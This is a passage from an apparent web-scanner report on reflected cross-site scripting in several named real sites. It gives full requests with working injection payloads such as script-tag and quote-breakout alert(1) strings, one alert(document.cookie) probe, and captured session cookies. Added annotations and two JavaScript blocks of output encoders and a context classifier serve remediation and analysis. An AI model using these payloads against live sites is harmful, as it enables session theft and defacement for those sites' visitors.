Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:23 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045223"
Content-Type: text/html; charset=utf-8
Content-Length: 30463
Date: Sun, 17 Apr 2011 13:00:25 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/a6ac6"><script>alert(1)</script>480844bb7c3/files/css_injector_1.css?D" />
...[SNIP]...

4.67. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_1.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_1.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9a74"-alert(1)-"ec10ab2148f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/css_injector_1.csse9a74"-alert(1)-"ec10ab2148f?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:40 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045240"
Content-Type: text/html; charset=utf-8
Content-Length: 31837
Date: Sun, 17 Apr 2011 13:00:42 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
me = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_1.csse9a74"-alert(1)-"ec10ab2148f?D";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.68. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_1.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_1.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c50a"><script>alert(1)</script>d5b800973fa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/css_injector_1.css5c50a"><script>alert(1)</script>d5b800973fa?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:35 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045235"
Content-Type: text/html; charset=utf-8
Content-Length: 30565
Date: Sun, 17 Apr 2011 13:00:37 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_1.css5c50a"><script>alert(1)</script>d5b800973fa?D" />
...[SNIP]...
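Findings 4.64 to 4.68 are all the same defect seen in two output contexts: the request path is written into the s.pageName JavaScript string of an inline <script> block and into the href of the canonical <link>, in both cases without encoding for the context. The block below is an added example, not code from the report or from the scanned site; it shows the two context-specific encoders that would have closed all five findings and checks them against the report's own payloads. The function names, the PAYLOADS table and the two "IsSafe" checks are this example's own; the host name and the two template lines are copied from the 4.64 to 4.68 responses.

```javascript
// Added example, not code from the report or from the scanned site. It shows the
// output encoding that would have closed findings 4.64-4.68: one encoder for a
// JavaScript string literal inside an inline <script> block and one for an HTML
// attribute value, applied to the report's own payloads. The host name and the
// two template lines are copied from the 4.64-4.68 responses.

// Escape a value for a JS string literal (either quote style) that is embedded in
// an HTML <script> block. Quotes and backslash are escaped for the JS context;
// "<", ">" and "/" are escaped too so "</script>" can never be produced, because
// the HTML parser ends the block at that sequence no matter what the JS string
// state is (that is the 4.64 payload). U+2028/U+2029 end a JS string literal in
// pre-ES2019 engines, so they are escaped as well.
function encodeForJsString(value) {
  return String(value).replace(/[\\"'<>\/\u2028\u2029\r\n\t\0]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code > 0xff
      ? "\\u" + code.toString(16).padStart(4, "0")
      : "\\x" + code.toString(16).padStart(2, "0");
  });
}

// Escape a value for a quoted HTML attribute (the 4.66 / 4.68 context).
function encodeForHtmlAttribute(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// The two fragments the scanned pages generated from the request path.
function buildScriptLine(path, encode) {
  const v = encode ? encodeForJsString(path) : path;
  return 's.pageName="404:http://usa.kaspersky.com' + v + '";';
}
function buildCanonicalLink(path, encode) {
  const v = encode ? encodeForHtmlAttribute(path) : path;
  return '<link rel="canonical" href="http://usa.kaspersky.com' + v + '" />';
}

// Count quote characters that are not preceded by a backslash.
function countUnescapedQuotes(s, quote) {
  let n = 0;
  for (let i = 0; i < s.length; i++) {
    if (s[i] === "\\") { i++; continue; }
    if (s[i] === quote) n++;
  }
  return n;
}

// Conservative context checks: the script line must contain exactly its two
// delimiting quotes and no "</script"; the link tag must contain exactly its four
// attribute-delimiting quotes and no raw < > " inside the href value.
function scriptLineIsSafe(line) {
  return countUnescapedQuotes(line, '"') === 2 && !/<\/script/i.test(line);
}
function linkTagIsSafe(tag) {
  const start = tag.indexOf('href="') + 6;
  const inner = tag.slice(start, tag.lastIndexOf('"'));
  return (tag.match(/"/g) || []).length === 4 && !/[<>"]/.test(inner);
}

// Payloads copied from findings 4.64, 4.65 and 4.66.
const PAYLOADS = {
  scriptBreakout: "/sites/default/files/61fec</script><script>alert(1)</script>a37e498334b",
  jsStringBreakout: '/sites/981ec"-alert(1)-"965c4b42b5c/files/css_injector_1.css?D',
  attributeBreakout: '/sites/a6ac6"><script>alert(1)</script>480844bb7c3/files/css_injector_1.css?D',
};

// For each payload: is the raw fragment safe, and is the encoded fragment safe?
function evaluatePayloads() {
  const out = {};
  for (const [name, p] of Object.entries(PAYLOADS)) {
    out[name] = {
      rawScript: scriptLineIsSafe(buildScriptLine(p, false)),
      encodedScript: scriptLineIsSafe(buildScriptLine(p, true)),
      rawLink: linkTagIsSafe(buildCanonicalLink(p, false)),
      encodedLink: linkTagIsSafe(buildCanonicalLink(p, true)),
    };
  }
  return out;
}
```

The encoded JavaScript string evaluates back to the original path, so s.pageName still carries the real 404 URL for analytics. Note that JSON.stringify alone would not have fixed 4.64: it escapes the quotes but leaves </script> intact, and the HTML parser acts on that sequence before the JavaScript engine ever sees the string.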

4.69. http://webroot.tt.omtrdc.net/m2/webroot/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://webroot.tt.omtrdc.net
Path:   /m2/webroot/mbox/standard

Issue detail

The value of the mbox request parameter is echoed into the response body, which is served as text/javascript rather than HTML: it lands inside a single-quoted JavaScript string literal passed to mboxFactories.get('default').get(...). The payload a56ed<script>alert(1)</script>7b64c0d8f47 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

The scanner's classification of this reflection as plain text between HTML tags does not fit the response. Inside a script body a <script> tag is inert string content, so this request demonstrates unfiltered reflection of the mbox value into executable script, not execution of the payload. A browser that opens the URL directly renders a text/javascript body as text; a page that loads it via <script src> executes it, and there the character to test is a single quote, which would terminate the string literal. The report contains no such test, so the High/Certain rating is not supported by this evidence alone.

Request

GET /m2/webroot/mbox/standard?mboxHost=www.webroot.com&mboxSession=1303044923199-20205&mboxPage=1303044923199-20205&screenHeight=1200&screenWidth=1920&browserWidth=1079&browserHeight=1016&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=US-land-ss-promo-freescan-pagewrapa56ed<script>alert(1)</script>7b64c0d8f47&mboxId=0&mboxTime=1303026923509&mboxURL=http%3A%2F%2Fwww.webroot.com%2FEn_US%2Fland-ss-promo-freescan.html&mboxReferrer=&mboxVersion=39&mboxXDomainCheck=true HTTP/1.1
Host: webroot.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.webroot.com/En_US/land-ss-promo-freescan.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1303044923199-20205; mboxPC=1303044923199-20205.17

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1303044923199-20205.17; Domain=webroot.tt.omtrdc.net; Expires=Mon, 17-Oct-2011 12:58:00 GMT; Path=/m2/webroot
Content-Type: text/javascript
Content-Length: 229
Date: Sun, 17 Apr 2011 12:57:59 GMT
Server: Test & Target

mboxFactories.get('default').get('US-land-ss-promo-freescan-pagewrapa56ed<script>alert(1)</script>7b64c0d8f47',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303044923199-20205.17");

4.70. http://webroot.tt.omtrdc.net/m2/webroot/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://webroot.tt.omtrdc.net
Path:   /m2/webroot/mbox/standard

Issue detail

The value of the mbox request parameter is echoed into the response body, which, as in 4.69, is served as text/javascript and places the value inside a single-quoted JavaScript string literal passed to mboxFactories.get('default').get(...). The payload 44d8b<script>alert(1)</script>66a3b0ec8df was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

The same caveat as in 4.69 applies: within a script body the <script> tags are inert, so this request shows unfiltered reflection rather than script execution, and the relevant follow-up test (a single quote in the mbox value) is not in the report.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /m2/webroot/mbox/standard?mboxHost=www.webroot.com&mboxSession=1303044923199-20205&mboxPage=1303044923199-20205&screenHeight=1200&screenWidth=1920&browserWidth=1079&browserHeight=1016&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=US-land-ss-promo-freescan-pagewrap44d8b<script>alert(1)</script>66a3b0ec8df&mboxId=0&mboxTime=1303026923509&mboxURL=http%3A%2F%2Fwww.webroot.com%2FEn_US%2Fland-ss-promo-freescan.html&mboxReferrer=&mboxVersion=39 HTTP/1.1
Host: webroot.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.webroot.com/En_US/land-ss-promo-freescan.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1303044923199-20205.17; Domain=webroot.tt.omtrdc.net; Expires=Mon, 17-Oct-2011 12:58:28 GMT; Path=/m2/webroot
Content-Type: text/javascript
Content-Length: 229
Date: Sun, 17 Apr 2011 12:58:28 GMT
Server: Test & Target

mboxFactories.get('default').get('US-land-ss-promo-freescan-pagewrap44d8b<script>alert(1)</script>66a3b0ec8df',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303044923199-20205.17");

4.71. http://widgets.digg.com/buttons/count [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is echoed into the response body, which is served as application/json: it lands inside a double-quoted JSON string value in the __DBW.collectDiggs({...}) callback. The payload 26212<script>alert(1)</script>78fde6bcdfc was submitted in the url parameter. This input was echoed unmodified in the application's response.

Within a JSON string the <script> tags are inert, and a browser that opens the URL directly shows an application/json body as text, so this request demonstrates only that the url value is reflected without HTML encoding. Whether that becomes script execution depends on the page that consumes the callback (for example, if it writes url into the DOM unencoded), which the report does not show; nor does it show a test with a double quote, which a JSON encoder would normally escape. The High/Certain rating is therefore not supported by this evidence alone.

Request

GET /buttons/count?url=file%3A///C%3A/Users/crawler/Documents/xss-dork-lawyers-cross-site-scripting-poc-example-report.html26212<script>alert(1)</script>78fde6bcdfc HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cm.BNlU3ABZHXPpB8PFLJNsjdDI.BZHXPpHWhprofile=1302162943; d=fefe6614082a299e480fa82a030f6b9ca66e5879ab6cfb62ab4c68eb320e6b6d; s_vi=[CS]v1|26CEB6F6850116A7-40000108E0006B5B[CE]; s_nr=1302162936988; traffic_control=-781655937076166248%3A200; s_vnum=1304754922563%26vn%3D2

Response

HTTP/1.1 200 OK
Age: 0
Date: Sat, 16 Apr 2011 15:38:08 GMT
Via: NS-CACHE: 100
Etag: "9858d7c55d55811a51331e91c7debbf68dbde3df"
Content-Length: 181
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Sat, 16 Apr 2011 15:48:07 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///C:/Users/crawler/Documents/xss-dork-lawyers-cross-site-scripting-poc-example-report.html26212<script>alert(1)</script>78fde6bcdfc", "diggs": 0});
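Findings 4.69 to 4.71 are labelled "plain text between tags" although their responses are script and JSON bodies, while 4.64 and 4.66 are correctly placed in a JavaScript string and an attribute value. The difference comes from where a scanner walks the response up to the reflection point and, above all, whether it honours the Content-Type. The block below is an added example, not part of the report or of any scanner's code: a deliberately minimal context classifier (no handling of JavaScript comments, regular-expression or template literals) run over trimmed copies of the 4.69, 4.71, 4.64, 4.66 and 4.75 response bodies. The function and sample names are this example's own.

```javascript
// Added example, not code from the report or from any of the scanned services: a
// minimal reflection-context classifier of the kind a scanner runs before it labels
// a finding. It walks the response body up to the first occurrence of the probe and
// reports the syntactic context at that point. The Content-Type is honoured: a
// text/javascript or application/json body is script from its first byte, so a
// "<script>" probe echoed there sits inside a JS string literal, not "between tags".
// Deliberately minimal: no handling of JS comments, regex or template literals.
function classifyReflection(body, contentType, probe) {
  const at = body.indexOf(probe);
  if (at < 0) return "not reflected";
  const scriptBody = /^(text\/javascript|application\/(json|javascript|x-javascript))\b/i
    .test(contentType);
  let inScript = scriptBody;  // inside <script>...</script> or a pure script body
  let inTag = false;          // between < and > of an HTML tag
  let pendingScript = false;  // the tag being read is an opening <script ...>
  let attrQuote = null;       // quote character of the attribute value we are in
  let jsQuote = null;         // quote character of the JS string literal we are in

  for (let i = 0; i < at; i++) {
    const ch = body[i];
    if (inScript) {
      // The HTML parser ends the block at "</script" whatever the JS string state
      // (the 4.64 payload relies on exactly this); a pure script body has no tags.
      if (!scriptBody && body.slice(i, i + 8).toLowerCase() === "</script") {
        inScript = false; inTag = true; jsQuote = null;
      } else if (jsQuote) {
        if (ch === "\\") i++;            // skip the escaped character
        else if (ch === jsQuote) jsQuote = null;
      } else if (ch === '"' || ch === "'") {
        jsQuote = ch;
      }
    } else if (inTag) {
      if (attrQuote) {
        if (ch === attrQuote) attrQuote = null;
      } else if (ch === '"' || ch === "'") {
        attrQuote = ch;
      } else if (ch === ">") {
        inTag = false;
        inScript = pendingScript;
        pendingScript = false;
      }
    } else if (ch === "<") {
      inTag = true;
      pendingScript = /^<script\b/i.test(body.slice(i, i + 8));
    }
  }
  if (inScript && jsQuote) return `JS string (${jsQuote}-quoted)`;
  if (inScript) return "JS code";
  if (inTag && attrQuote) return `HTML attribute value (${attrQuote}-quoted)`;
  if (inTag) return "HTML tag";
  return "HTML text between tags";
}

// Trimmed response bodies copied from findings 4.69, 4.71, 4.64, 4.66 and 4.75.
const SAMPLES = {
  mbox: { contentType: "text/javascript", probe: "a56ed<script>alert(1)</script>7b64c0d8f47",
    body: "mboxFactories.get('default').get('US-land-ss-promo-freescan-pagewrapa56ed<script>alert(1)</script>7b64c0d8f47',0).setOffer(new mboxOfferDefault()).loaded();" },
  digg: { contentType: "application/json", probe: "26212<script>alert(1)</script>78fde6bcdfc",
    body: '__DBW.collectDiggs({"url": "file:///C:/Users/crawler/Documents/xss-dork-lawyers-cross-site-scripting-poc-example-report.html26212<script>alert(1)</script>78fde6bcdfc", "diggs": 0});' },
  scriptBlock: { contentType: "text/html; charset=utf-8", probe: "61fec</script>",
    body: '<script>\ns.pageName="404:http://usa.kaspersky.com/sites/default/files/61fec</script><script>alert(1)</script>a37e498334b";\n</script>' },
  canonical: { contentType: "text/html; charset=utf-8", probe: 'a6ac6"><script>',
    body: '<link rel="canonical" href="http://usa.kaspersky.com/sites/a6ac6"><script>alert(1)</script>480844bb7c3/files/css_injector_1.css?D" />' },
  strong: { contentType: "text/html; charset=UTF-8", probe: "91a11<script>",
    body: "<strong>bookmark.php91a11<script>alert(1)</script>451b4735667</strong>" },
};

// Classify every sample; returns a name -> context map.
function classifySamples() {
  const out = {};
  for (const [name, s] of Object.entries(SAMPLES)) {
    out[name] = classifyReflection(s.body, s.contentType, s.probe);
  }
  return out;
}
```

For the 4.64 body the classifier also shows the second half of the story: probing for the part after 61fec</script> reports "HTML text between tags", because by then the parser has closed the script element and the injected <script> opens a new one.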

4.72. http://wsdsapi.infospace.com/infomaster/widgets [qkwid1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wsdsapi.infospace.com
Path:   /infomaster/widgets

Issue detail

The value of the qkwid1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 405e1'%3balert(1)//58d1fc3843d was submitted in the qkwid1 parameter. This input was echoed as 405e1';alert(1)//58d1fc3843d in the application's response: the server URL-decodes %3b to ;, so the payload closes the string literal, ends the statement and runs alert(1), and the trailing // comments out the remainder of the original line so the script stays syntactically valid.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /infomaster/widgets?wid=pt&qkwid1=qkw405e1'%3balert(1)//58d1fc3843d&submitid1=sqkw HTTP/1.1
Host: wsdsapi.infospace.com
Proxy-Connection: keep-alive
Referer: http://www.info.com/?9857d%22-alert(document.cookie)-%221634c822576=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sun, 17 Apr 2011 14:28:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=cynPrBfSr6wOq0-qFaDs_K4AWxqbjFJYfMS4ue0Nu3EP7nbZjaWwwZQN4J4zs6cmIsld-_j2aIhk2g_1P2mafnr5hwE3zhwrC5fvIRJD0aAv6AUF6DKooFdV1RipdQgWbTW1aHTXUBHzJ0PZclM3hHqED5tp5xHkXgVnw3krlBW8btsG0; expires=Tue, 12-Mar-2013 01:08:05 GMT; path=/
Set-Cookie: ASP.NET_SessionId=v2zs5o455vktcdj4vlohjj3d; path=/
Set-Cookie: DomainSession=TransactionId=ea2c97e5d3dd40deb9005d11cdfccb01&SessionId=81862bbe4e154ba7974b5d11cdfccb01&ActionId=22cdec59af59446cbb715d11cdfccb01&CookieDomain=.infospace.com; domain=.infospace.com; expires=Sun, 17-Apr-2011 14:48:05 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=979777e4d1ef4fecb1535d11cdfccb01&LastSeenDateTime=4/17/2011 2:28:05 PM&IssueDateTime=4/17/2011 2:28:05 PM&CookieDomain=.infospace.com; domain=.infospace.com; expires=Tue, 24-Mar-2111 14:28:05 GMT; path=/
Cache-Control: public
Expires: Sun, 17 Apr 2011 15:28:05 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent
Content-Length: 11855


                                   // variable contructors
var txtElements = [{txt:'qkw405e1';alert(1)//58d1fc3843d',btn:'sqkw'}];var rfcIDElements = [];

// Disable autocomplete
var input1 = document.getElementById('qkw405e1';alert(1)//58d1fc3843d');input1.setAttribute('autocomplete','off');

function JSONscr
...[SNIP]...

4.73. http://wsdsapi.infospace.com/infomaster/widgets [submitid1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wsdsapi.infospace.com
Path:   /infomaster/widgets

Issue detail

The value of the submitid1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1889f'%3balert(1)//4c7b192af5d was submitted in the submitid1 parameter. This input was echoed as 1889f';alert(1)//4c7b192af5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /infomaster/widgets?wid=pt&qkwid1=qkw&submitid1=sqkw1889f'%3balert(1)//4c7b192af5d HTTP/1.1
Host: wsdsapi.infospace.com
Proxy-Connection: keep-alive
Referer: http://www.info.com/?9857d%22-alert(document.cookie)-%221634c822576=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sun, 17 Apr 2011 14:28:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=TblQjB3Kf3UeeA8Ddb6tIlxgfpinUzJcOoyXqCmtv1TGOwEwyN_iY0q2oOZmFvHwVcLj_9vunW8iA59R2Sa7AYvXBTDPrp6g4DYLuKzWKhalNt7QbNTj7ebK8lT6iy-4FgDmbSisXR4oP_ROlYIU_2ldcw0PSnA1nGJNabFUsw0smt020; expires=Tue, 12-Mar-2013 01:08:06 GMT; path=/
Set-Cookie: ASP.NET_SessionId=i3yvohbjrhxfuv2idjlidwe1; path=/
Set-Cookie: DomainSession=TransactionId=3755bccb16cf4086b6a55d11cdfccb01&SessionId=6aec8e48eda34c8a81885d11cdfccb01&ActionId=17685e97d218424cbffc5d11cdfccb01&CookieDomain=.infospace.com; domain=.infospace.com; expires=Sun, 17-Apr-2011 14:48:06 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=22769300428a417aa0da5d11cdfccb01&LastSeenDateTime=4/17/2011 2:28:06 PM&IssueDateTime=4/17/2011 2:28:06 PM&CookieDomain=.infospace.com; domain=.infospace.com; expires=Tue, 24-Mar-2111 14:28:06 GMT; path=/
Cache-Control: public
Expires: Sun, 17 Apr 2011 15:28:06 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent
Content-Length: 11831


                                   // variable contructors
var txtElements = [{txt:'qkw',btn:'sqkw1889f';alert(1)//4c7b192af5d'}];var rfcIDElements = [];

// Disable autocomplete
var input1 = document.getElementById('qkw');input1.setAttribute('autocomplete','off');

function JSONscriptRequest(fullUrl, query) {
// RE
...[SNIP]...

4.74. http://www.100zakladok.ru/save/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.100zakladok.ru
Path:   /save/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60141"><script>alert(1)</script>9b64324f456 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /save/?60141"><script>alert(1)</script>9b64324f456=1 HTTP/1.1
Host: www.100zakladok.ru
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:20:38 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=windows-1251
Content-Length: 8732

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>100zakladok.ru - .......... ...... ... ........ ..... ........-........</tit
...[SNIP]...
<a href="/save/?60141"><script>alert(1)</script>9b64324f456=1">
...[SNIP]...

4.75. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 91a11<script>alert(1)</script>451b4735667 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php91a11<script>alert(1)</script>451b4735667 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 17 Apr 2011 14:20:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=1hv6ufnjamb9mds53gfocv6570; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1378
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php91a11<script>alert(1)</script>451b4735667</strong>
...[SNIP]...

